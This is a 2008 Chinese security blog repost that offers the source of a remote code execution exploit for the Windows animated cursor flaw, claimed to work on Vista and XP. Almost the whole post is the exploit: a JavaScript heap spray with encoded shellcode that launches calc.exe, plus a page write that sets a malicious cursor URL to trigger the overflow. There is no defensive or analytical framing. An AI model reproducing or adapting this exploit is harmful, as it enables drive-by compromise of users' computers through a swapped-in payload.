首页 > 网络安全 > Vista 光标远程溢出源代码

Vista 光标远程溢出源代码

2008年7月23日 发表评论 阅读评论

from:搁浅's Blog

<br />..::&#91; geqian presents &#93;::..<br /><br />Windows Animated Cursor Handling Exploit (0day)<br /><br />Works on fully patched Windows Vista<br />I think it is first real remote code execution exploit on vista =)<br /><br />Tested on:<br />Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)<br />Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)<br />Windows XP SP2<br />(It also must to work on all nt based windows but not tested)<br /><br />Author: geqian<br />Mail: 70527418@vip.qq.com<br /><br />Bug discovered by determina (http://www.aground.cn/)<br /><br />Credit: geqian, http://www.aground.cn/<br /><br />invokes calc.exe if successful<br /><br />--><br /><br /><SCRIPT language="javascript"><br />var heapSprayToAddress = 0x07000000;<br /><br />var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");<br /><br />var heapBlockSize = 0x400000;<br /><br />var payLoadSize = payLoadCode.length * 2;<br /><br />var spraySlideSize = heapBlockSize - (payLoadSize+0x38);<br /><br />var spraySlide = unescape("%u4141%u4141");<br />spraySlide = getSpraySlide(spraySlide,spraySlideSize);<br /><br />heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;<br /><br />memory = new Array();<br /><br />for (i=0;i<heapBlocks;i++)<br />{<br />memory&#91;i&#93; = spraySlide + payLoadCode;<br />}<br /><br />document.write("<HTML><BODY style=&#92;"CURSOR: url($1$riff.htm$1$)&#92;"> </BODY></HTML>")<br />wait(500)<br />window.location.reload()<br /><br />function getSpraySlide(spraySlide, spraySlideSize)<br />{<br />while (spraySlide.length*2<spraySlideSize)<br />{<br />spraySlide += spraySlide;<br />}<br />spraySlide = spraySlide.substring(0,spraySlideSize/2);<br />return spraySlide;<br />}<br /></SCRIPT>

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:Vista 光标远程溢出源代码
本文地址:http://www.woyigui.cn/2008/07/23/Vista-cursor-remote-overflow/

分类: 网络安全 标签: ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*